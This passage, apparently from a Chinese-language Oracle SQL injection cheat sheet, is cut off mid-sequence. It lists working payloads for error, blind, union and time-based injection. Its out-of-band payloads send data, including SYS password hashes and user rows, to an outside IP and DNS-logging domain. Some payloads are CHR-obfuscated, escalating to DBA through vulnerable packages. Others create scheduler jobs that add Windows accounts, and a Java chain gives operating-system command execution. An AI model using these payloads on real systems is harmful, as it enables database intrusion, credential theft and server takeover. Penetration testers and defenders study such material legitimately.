\u770b\u8d4b\u4e88\u89d2\u8272\u6743\u9650\nselect instance_name from v$instance#\u670d\u52a1\u5668sid \u8fdc\u7a0b\u94fe\u63a5\u9700\u8981\nselect utl_inaddr.get_host_name('127.0.0.1') from dual; #\u67e5\u8be2\u5185\u7f51hostname win08dc.contoso.com\nSELECT UTL_HTTP.REQUEST('http:\/\/localhost') FROM dual;  #\u5bf9\u5916\u901a\u4fe1\nSELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;\nselect table_name from user_tables where lower(table_name)='books'   #\u67e5\u770bbooks\u8868\u4e66\u5426\u5b58\u5728\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Error Based(\u62a5\u9519\u6ce8\u5165)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>(10g or 11g)\n' and 1 = ctxsys.drithsx.sn(1,(select user from dual))--  \nand 1=(dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1))) and 1=1. \n' and 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4113=4113) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)--  \n' and dbms_xdb_version.checkin((select user from dual))='1'--  \n' and dbms_xdb_version.makeversioned((select user from dual))='1'--  \n' and dbms_utility.sqlid_to_sqlhash((select user from dual))='1'--  \n' and dbms_utility.sqlid_to_sqlhash((select user from dual))='1'--  \n' and 1=(select decode(substr(user,1,1),'S',(1\/0),0) from dual)--     #user\u7b2c\u4e00\u4f4d\u662fS ORA-01476: divisor is equal to zero \n' order by (SELECT (CASE WHEN (2434=2434||utl_inaddr.get_host_name((select banner from v$version where rownum=1))) THEN 2434 ELSE CAST(1 AS INT)\/0 END) FROM DUAL)--%'  \n\n11g\u666e\u901a\u7528\u6237\u4e0d\u80fd\u7528\u7684#utl_inaddr not work maybe acl(11g normal user) or java not installed etc\n'||utl_inaddr.get_host_address((select banner from v$version where rownum=1))||'    \n'||utl_inaddr.get_host_name((select banner from v$version where rownum=1))||'\n\n10g\u4e0d\u80fd\u7528\u7684\n' and dbms_aw_xml.readawmetadata((select sys_context('USERENV', 'SESSION_USER') from dual), null) is null --    #(11g 10g\u62a5\u9519ORA-29532: Java call terminated by uncaught Java exception: java.lang.OutOfMemoryError)\n' or dbMS_aW_xMl.reAdaWmetaData((select sYS_cONtExt('US' || 'ERENV', 'SESS' || 'ION_US' || 'ER') from dUAl), null) is null --# bypass 1\n' and 1=(ordsys.ord_dicom.getmappingxpath((select user from dual),user,user))-- \n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Boolean-based blind(boolean\u578b\u76f2\u6ce8)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and  1=(1) and substr(user,0,1)='Z\n' and length(user)=6-- length('a')=1-- length(1111)=4\nname=admin adm'||case when 1=2 then NULL else 1 end||'in(\u641c\u7d22\u6846\u4e5f\u53ef\u7528)\n'||case when length(sys.database_name)=8 then NULL else 1 end||'\na%' order by (case when 1=2 then name else 'somthing' end)--    #\u8868\u8fbe\u5f0f\u4e3a\u771f\u6839\u636eid\u6392\u5e8f\u4e3a\u5047\u6839\u636esomething\n\u6392\u5e8f\u4e0d\u540c\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Union(\u8054\u5408\u67e5\u8be2)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1=2 union select NULL,NULL,NULL--\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Time(\u65f6\u95f4\u76f2\u6ce8)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code> order by (case when(1=1) then dbms_pipe.receive_message('ku', 10) else 1 end)\n ' and 1 = case when substr(user, 1, 1) = 'S' then dbms_pipe.receive_message('ku', 10) else 1 end --\n ' and 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(121)||CHR(68)||CHR(74),5)\n ?id=(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),14) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>stack query(\u5806\u53e0\u67e5\u8be2)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>oralce\u4e0d\u652f\u6301\u5806\u53e0\u67e5\u8be2\uff0c\u9664\u975e\u4f60\u627e\u5230\u80fd\u5229\u7528PL\/SQL\u7684\u76f8\u5173\u51fd\u6570\u3002#No stacked queries Cannot add ; do something nasty Unless you get really lucky to be injected into PL\/SQL*\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Out of Band(OOB)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#both 10 and 11g\uff08window\u65e0\u9650\u5236\uff09\nselect DBMS_LDAP.INIT((select user from dual)||'.fzrsuf.3w1.pw',80) from dual \nSELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.fzrsuf.3w1.pw',80) FROM dual     #\u83b7\u53d6sys\u5bc6\u7801\n\n#both 10 and 11g\uff08oracle 11g\u666e\u901a\u7528\u6237\u6709\u9650\u5236)\nSELECT UTL_HTTP.REQUEST('http:\/\/74.121.151.89') FROM DUAL;  #get the first 2000 bytes of data \nselect utl_inaddr.get_host_address((select 1234567811 from dual)||'.fzrsuf.3w1.pw') from dual\n\n#all users,8-10g R2\nselect httpuritype( 'http:\/\/74.121.151.89\/123344\/back.pl').getclob() from dual; \n\n#both 10 and 11g\uff08oracle 11g\u666e\u901a\u7528\u6237\u6709\u9650\u5236) \n(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % nakut SYSTEM \"http:\/\/'||(select CHR(51)||CHR(54)||CHR(48) from dual)||'.fzrsuf.3w1.pw\/\"&gt;%nakut;]&gt;'),'\/l') from dual)    \n(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(SELECT user from dual)||'\"&gt; %remote;]&gt;'),'\/l') from dual)\n(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(select listagg(id||chr(58)||name,',') within group (order by id) from users where rownum&lt;5)||'\"&gt; %remote; %param1;]&gt;'),'\/l') from dual)    #GET \/admin:1,safe:2,test:3 \u83b7\u53d6\u524d\u4e09\u5217 (10g\u83b7\u53d6\u62a5\u9519\u4e86)\n\nweb\u4e0b\u5229\u7528\n'||UTL_HTTP.REQUEST('http:\/\/74.121.151.89:8888')||'\n'||utl_inaddr.get_host_address((select 1234567811 from dual)||'.fzrsuf.3w1.pw')||'\n'||DBMS_LDAP.INIT((select user from dual)||'.fzrsuf.3w1.pw',80))||'\n\n' and utl_inaddr.get_host_address((select 1234567811 from dual)||'.fzrsuf.3w1.pw')=1--\n' and utl_inaddr.get_host_address((select 3333333 from dual)||'.fzrsuf.3w1.pw') like 1--\n' and UTL_HTTP.REQUEST('http:\/\/74.121.151.89:8888')='1'--\n' and DBMS_LDAP.INIT((select user from dual)||'.fzrsuf.3w1.pw',80) is not null--    #\u540e\u9762\u8981\u52a0is not null\n\n' and (select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(SELECT user from dual)||'\"&gt; %remote;]&gt;'),'\/l') from dual)||'\n' and 1=(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(SELECT user from dual)||'\"&gt; %remote;]&gt;'),'\/l') from dual) or '1'='1\n' AND 1=(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(select listagg(id||chr(58)||name,',') within group (order by id) from users where rownum&lt;5)||'\"&gt; %remote; %param1;]&gt;'),'\/l') from dual)--    #\u53ef\u80fd\u4f1a\u62a5\u9519 \u4f46\u8fd8\u662f\u4f1a\u6267\u884c \u5c3d\u91cf\u7528\u4e00\u4e9b53 80\u7684\u7aef\u53e3\n' AND 1=(select extractvalue(xmltype('&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM \"http:\/\/74.121.151.89:8888\/'||(select listagg(id||chr(58)||name,',') within group (order by id) from users where rownum&lt;5)||'\"&gt; %remote; %param1;]&gt;'),'\/l') from dual)--\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>\u624b\u5de5\u6ce8\u5165<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#\u67e5\u8be2\u6846\u6ce8\u5165\u793a\u4f8b(Boolean)\nname=a%' and (select count(*) from users)&lt;&gt;0 and '%'='   #\u4e0d\u7b49\u4e8e\u4e3a&lt;&gt; \u8fd4\u56de\u4e00\u6837\u8bc1\u660eusers\u8868\u5b58\u5728\nname=a%' and (select count(*) from users)&lt;&gt;3 and '%'='  #\u8fd4\u56de\u4e0d\u4e00\u6837\u8bc1\u660eusers\u8868\u884c\u6570\u4e3a3\nselect count(id) from users   #\u8bc1\u660eid\u5b57\u6bb5\u5b58\u5728\nselect count(name) from users   #\u8bc1\u660ename\u5b57\u6bb5\u5b58\u5728\nname=a%' and  (select length(name) from users where id=1)&lt;&gt;5 and '%'='  #\u8fd4\u56de\u4e0d\u4e00\u81f4\u8bc1\u660eid\u4e3a1\u7684\u5217name\u6570\u636e\u957f\u5ea6\u4e3a5 \u53bb\u6389id=1\u4fe1\u606f\u8dd1\u5176\u4e2d\u7b2c\u4e00\u4e2aname\u957f\u5ea6\u4e3a5\u7684\u6570\u636e\nname=a%' and  ((select count(*) from users where id=1 and ascii(substr(name,1,1))=97))&lt;&gt;0 and '%'='   #\u6709\u8fd4\u56de\u8bc1\u660e\u7b2c\u4e00\u4f4d\u5b57\u7b26\u4e3aa\nname=a%' and  ((select count(*) from users where id=1 and ascii(substr(name,2,1))=100))&lt;&gt;0 and '%'='  #\u7b2c\u4e8c\u4f4d\u5b57\u7b26\u4e3ad\nname=a%' and  (select count(*) from users where ascii(substr(name,1.1))&gt;=97)=1 and '%'='    #\u53ea\u6709\u4e00\u4e2a\u7528\u6237\nname=a%' and  (select count(*) from users where length(name)=4 and ascii(substr(name,1,1))=115 and ascii(substr(name,2,1))=97)&lt;&gt;0 and '%'='  #\u4e0d\u52a0id\u5982\u679c\u6570\u636e\u591a\u7565\u5fae\u9ebb\u70e6\u4e00\u70b9    #\u591a\u7528\u6237\u8dd1name\u4e3asafe \u524d\u4fe9\u4f4d \u4e0d\u591a\u8be6\u89e3\n\n#\u62a5\u9519\u6ce8\u5165(Error Based)\nselect * from user_tab_columns where column_name like '%name%'    #user_table_columns=user_tab_cols\ntable_name  column_name data_type\nusers   name    VARCHAR2\ntest    name    VARCHAR2\nselect count(*) from user_tab_columns where column_name like '%name%'   #\u67e5\u8be2\u5b57\u6bb5\u4e2d\u6709password\u5230\u8868\u540d \u8fd4\u56de\u884c\u6570\nselect chr(35)||data||chr(39) from (select rownum as limit,table_name||chr(35)||column_name as data from user_tab_columns where column_name like '%name%') where limit =2    #\u67e5\u770b\u7b2c\u4e8c\u6761\u542b\u6709\u5217\u540d%name%\u7684\u8868\u660e\u5217\u540d\nname=a%' and  1=(utl_inaddr.get_host_address(((select chr(35)||data||chr(39) from (select rownum as limit,table_name||chr(35)||column_name as data from user_tab_columns where column_name like '%name%') where limit =2)))) and '%'='  #\u901a\u8fc7\u62a5\u9519\u63d0\u53d6\u7b2c\u4e8c\u884c\u6570\u636e\nWarning: oci_execute(): ORA-29257: host #users##name' unknown ORA-06512:  #\u8868\u660eusers \u5217\u540dname\nselect chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115)) whEre limit =1    #\u83b7\u53d6\u8be5\u8868\u7b2c\u4e00\u4e2a\u5217\u540d CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115))\u4e3ausers\u7f16\u7801\u6240\u5f97\nname=a%' and  1=(utl_inaddr.get_host_address(((select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115)) whEre limit =1))))  and '%'='\nWarning: oci_execute(): ORA-29257: host ~'id'~ \nname=a%' and  1=(utl_inaddr.get_host_address(((select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=CHR(117) || CHR(115) || CHR(101) || CHR(114) || CHR(115)) whEre limit =2))))  and '%'='\nWarning: oci_execute(): ORA-29257: host ~'name'~ \nname=a%' and  1=(utl_inaddr.get_host_address((Select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,id||chr(35)||NAME as data from users) where limit=1)))  and '%'='\nWarning: oci_execute(): ORA-29257: host ~'1#admin'~ unknown\n\n'||utl_inaddr.get_host_name((SELECT table_name FROM USER_TAB_COLS WHERE COLUMN_NAME LIKE '%25%32%35F_YHKL%25%32%35' and table_name not like '%25%32%35%25%34%32%25%34%39%25%34%65%25%32%35' and table_name not in ('TBZYDA') and table_name not in('TBCZJZYDA') AND ROWNUM=1))||'   #oracle(\u8fd8\u662fjsp \u5fd8\u4e86)\u597d\u50cf\u53ef\u4ee5\u5bf9url\u7f16\u7801\u81ea\u52a8\u89e3\u7801 \u6d4b\u8bd5\u8d85\u8fc7\u4e09\u6b21\u5931\u8d25\n\n#\u6279\u91cf\u63d0\u53d6\n'||utl_inaddr.get_host_address((select listagg(id||chr(58)||name,',') within group (order by id) from users where rownum&lt;5))||' #listagg 11g\u4ee5\u4e0a\u63d0\u53d6\u6570\u636e\nselect wmsys.wm_concat(id||chr(58)||name) from user     #\u901a\u7528\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>\u8c03\u8bd5\u4fe1\u606f(\u672c\u6587\u7528\u5230\u7684)<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>select * from user_java_policy where grantee_name='SYSTEM'; \u67e5\u770bSYSTEM\u53ef\u7528\u7684java\u6743\u9650\u5217\u8868\uff0c\u901a\u8fc7\u4ee5\u4e0b\u547d\u4ee4\u67e5\u770b\u8d4b\u6743\u60c5\u51b5 #ORACLE\u4e0d\u8981\u7528\u53cc\u5f15\u53f7 \u53cc\u5f15\u53f7\u4f1a\u88ab\u5f53\u6210\u5b57\u7b26\u5904\u7406 \u6240\u4ee5\u4e00\u822c\u7528\u6210\u5bf9\u7684\u5f15\u53f7 '' '''' ''''''''\nselect * from user_objects where OBJECT_NAME='javaexec' #\u68c0\u6d4b\u5305\u662f\u5426\u521b\u5efa\u6210\u529f\nselect * from user_objects where OBJECT_NAME='JAVACMD'  #\u68c0\u6d4b\u51fd\u6570\u662f\u5426\u5b58\u5728 \u51fd\u6570\u8981\u4e48\u4e0e\u539f\u5148\u4e00\u81f4\u8981\u4e48\u5927\u5199 \nselect wmsys.wm_concat(granted_role) from user_role_privs-- \u770b\u8d4b\u4e88\u89d2\u8272\u6743\u9650\nselect text from all_source where name = 'DBMS_EXPORT_EXTENSION' \u67e5\u8be2\u5305\u7684\u6e90\u7801\nSELECT * FROM ALL_OBJECTS WHERE OBJECT_TYPE IN ('FUNCTION','PROCEDURE','PACKAGE') order by object_id desc; \u67e5\u8be2\u5df2\u5b89\u88c5\u7684\u51fd\u6570\n\u5220\u9664\u5bf9\u5e94\u7684\u67d0\u4e2a\u6743\u9650 \u5982\u53bb\u9664java.io.FilePermission\nbegin\n  DBMS_JAVA.DISABLE_PERMISSION(129);\n  dbms_java.delete_permission(129); \n  commit;\nend;\n\u5220\u9664\u76f8\u5173\u7684\u5305\u7c7b\u6216\u8005\u51fd\u6570  #Use the DROP JAVA statement to drop a Java source, class, or resource schema object.\nrevoke JAVASYSPRIV from SYSTEM;\ndrop JAVA SOURCE \"javaexec\";\ndrop FUNCTION SYSTEM.javacmd;\ndrop FUNCTION SYSTEM.myjava;\ndrop FUNCTION SYSTEM.myjava1;\ndrop FUNCTION SYSTEM.myjava2;\nlist all Java related stored objects class\nSELECT object_name,object_type,status,timestamp FROM user_objects WHERE (object_name NOT LIKE 'SYS_%' AND object_name NOT LIKE 'CREATE$%' AND object_name NOT LIKE 'JAVA$%' AND object_name NOT LIKE 'LOADLOB%') AND object_type LIKE 'JAVA %' ORDER BY object_type, object_name;\n'1'=utl_inaddr.get_host_name((select count(*) from user_objects where OBJECT_NAME='SasugaOracle'))--    #\u4f7f\u7528web\u8c03\u8bd5\nsqlplus \/nolog  #\u767b\u9646\u672c\u673a\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"0x2-\u547d\u4ee4\u6267\u884c\">0x2 \u547d\u4ee4\u6267\u884c<\/h3>\n<p>\u80fd\u63d0dba\u5c31\u63d0dba \u7136\u540egrant javasyspriv\u6743\u9650 \u521b\u5efaclass \u521b\u5efajavacmd \u6267\u884c\u547d\u4ee4\u4e0d\u80fd\u63d0dba dbms_xmlquery.newcontext\u8d4b\u4e88\u5176fileio\u6267\u884c\u6743\u9650(10g\u989d\u5916\u9700\u8981write read)<\/p>\n<ul>\n  <li>\u63d0\u6743\u5230dba\u7684\u51e0\u4e2a\u51fd\u6570\uff08\u6211\u5c31GET_DOMAIN_INDEX_TABLES\u6210\u529f\u8fc7\uff09<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#\u521b\u5efa\u63d0\u6743\u51fd\u6570\nand (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function pwn return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ''''grant dba to TEST'''';commit;return ''''z'''';END; ''; commit; end;') from dual) is not null --\n\n\u4f7f\u7528SYS.LT.CREATEWORKSPACE\u63d0\u6743 9iR2, 10gR1, 10gR2 and 11gR1     #fixed 2009.7\nand (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''\nbegin SYS.LT.CREATEWORKSPACE(''''A10'''''''' and TEST.pwn()=''''''''x'''');SYS.LT.REMOVEWORKSPA CE(''''A10'''''''' and TEST.pwn()=''''''''x'''');end;''; commit; end;') from dual) is not null --#\u672c\u5730\u5931\u8d25\n\n\u4f7f\u7528sys.dbms_cdc_publish.create_change_set\u63d0\u6743 10gR1, 10gR2, 11g R1 and 11gR2   #fixed 2010.10\nselect dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual--#\u672c\u5730\u5931\u8d25\n\n\u4f7f\u7528GET_DOMAIN_INDEX_TABLES Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('foo','bar','DBMS_OUTPUT\".PUT_LINE(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant dba to TEST''''; END;''; END;--', '', 0, '1', 0) from dual)=0--#\u6ce8 10.2.0.1\u6d4b\u8bd5\u6210\u529f\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>11g dba\u6743\u9650\u4e0b\u76f4\u63a5\u6267\u884c\u547d\u4ee4    #\u6d4b\u8bd5\u6570\u636e\u5e93<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>PL\/SQL\u5982\u4e0b:\nbegin\nDBMS_SCHEDULER.create_program('myprog11','EXECUTABLE','net user pwned pwn3d!! \/add',0,TRUE);\nDBMS_SCHEDULER.create_job(job_name=&gt;'myjob11',program_name=&gt;'myprog11',\nstart_date=&gt;NULL,repeat_interval=&gt;NULL,end_date=&gt;NULL,enabled=&gt;TRUE,auto_drop=&gt;TRUE);\ndbms_lock.sleep(1);\ndbms_scheduler.drop_program(program_name=&gt;'myprog11');\ndbms_scheduler.purge_log;\nend;\n#sql injection\u5982\u4e0b\uff1a\n' and (select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''myprog10'',''EXECUTABLE'',''net user pwnedfromweb pwn3d!! \/add'',0,TRUE);DBMS_SCHEDULER.create_job(job_name=&gt;''myjob10'',program_name=&gt;''myprog10'',start_date=&gt;NULL,repeat_interval=&gt;NULL,end_date=&gt;NULL,enabled=&gt;TRUE,auto_drop=&gt;TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=&gt;''myprog10'');dbms_scheduler.purge_log;')from dual) is not null --\nOracle Database 11g Express Edition Release 11.2.0.2.0 \u2013 Production #\u6d4b\u8bd5\u5931\u8d25\nOracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production    #\u6d4b\u8bd5\u5931\u8d25\n\n\u53c2\u8003\u6587\u7ae0\nhttps:\/\/www.notsosecure.com\/hacking-oracle-xe-from-web\/\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>dba\u4e0b\u8d4b\u4e88\u76f8\u5173\u6743\u9650<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>#only be executed by SYS.Affected Systems:8,9,10g R1,R2,11gR1\n(Select DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''grant dba to aaaa'''';end;''; end;--','CCCC') from dual) is not null-- \n(select DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(44)||CHR(86)||CHR(65)||CHR(76)||CHR(73)||CHR(68)||CHR(65)||CHR(84)||CHR(69)||CHR(95)||CHR(71)||CHR(82)||CHR(80)||CHR(95)||CHR(79)||CHR(66)||CHR(74)||CHR(69)||CHR(67)||CHR(84)||CHR(83)||CHR(95)||CHR(76)||CHR(79)||CHR(67)||CHR(65)||CHR(76)||CHR(40)||CHR(58)||CHR(99)||CHR(97)||CHR(110)||CHR(111)||CHR(110)||CHR(95)||CHR(103)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(41)||CHR(59)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(112)||CHR(114)||CHR(97)||CHR(103)||CHR(109)||CHR(97)||CHR(32)||CHR(97)||CHR(117)||CHR(116)||CHR(111)||CHR(110)||CHR(111)||CHR(109)||CHR(111)||CHR(117)||CHR(115)||CHR(95)||CHR(116)||CHR(114)||CHR(97)||CHR(110)||CHR(115)||CHR(97)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(59)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(103)||CHR(114)||CHR(97)||CHR(110)||CHR(116)||CHR(32)||CHR(100)||CHR(98)||CHR(97)||CHR(32)||CHR(116)||CHR(111)||CHR(32)||CHR(97)||CHR(97)||CHR(97)||CHR(97)||CHR(39)||CHR(39)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(45)||CHR(45)||CHR(44)||CHR(67)||CHR(67)||CHR(67)||CHR(67))from dual) is not null--\n\nOnly DBA can call this function\n(select SYS.KUPP$PROC.CREATE_MASTER_PROCESS(begin execute immediate 'grant javasyspriv to SYSTEM';end;)from dual) is not null   \n' AND (select SYS.KUPP$PROC.CREATE_MASTER_PROCESS(CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(103)||CHR(114)||CHR(97)||CHR(110)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(115)||CHR(121)||CHR(115)||CHR(112)||CHR(114)||CHR(105)||CHR(118)||CHR(32)||CHR(116)||CHR(111)||CHR(32)||CHR(83)||CHR(89)||CHR(83)||CHR(84)||CHR(69)||CHR(77)||CHR(39)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59))from dual) is not null-- \n\n\u53c2\u8003\u6587\u7ae0\nhttp:\/\/www.nocoug.org\/download\/2013-02\/NoCOUG_201302_Slavik_Markovich_SQL_Injection_in_Web_Applications.pdf\nhttps:\/\/media.blackhat.com\/bh-us-10\/whitepapers\/Siddharth\/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>\u547d\u4ee4\u6267\u884c<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>1. hacking 10g  Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2\nORACLE DATABASE 10G ENTERPRISE EDITION RELEASE 10.2.0.1.0\uff08\u8be5\u7248\u672c\u865a\u62df\u673a\u4e22\u5931 \u4e4b\u524d\u6d4b\u8bd5\u6210\u529f)\n1. \u63d0\u5347TEST\u7528\u6237\u5230dba\u6743\u9650    TEST\u7528\u6237\u540d\u8981\u5927\u5199\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('foo','bar','DBMS_OUTPUT\".PUT_LINE(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''grant dba to TEST''''; END;''; END;--', '', 0, '1', 0) from dual)=0--\n2. \u521b\u5efaJava\u5305\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('foo','bar','DBMS_OUTPUT\".PUT_LINE(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"SasugaOracle\" as import java.lang.*;import java.io.*;class SasugaOracle{public static String exec(String cmd){String ret=\"\",tmp;try{BufferedReader reader=new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));while ((tmp=reader.readLine())!=null){ret+=tmp;}reader.close();}catch(Exception ex){ret=ex.toString();}return ret;}}''''; END;''; END;--', '', 0, '1', 0) from dual)=0--\n3. \u8d4b\u4e88Java\u6743\u9650\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''&lt;&gt;'''''''',''''''''execute''''''''); end;'''';END;'';END;--','SYS',0,'1',0) from dual)=0--\n\u521b\u5efaruncmd\u51fd\u6570\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function runcmd(cmd in varchar2) return varchar2 as language java name ''''''''SasugaOracle.exec(java.lang.String) return java.lang.String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual)=0--\n4. 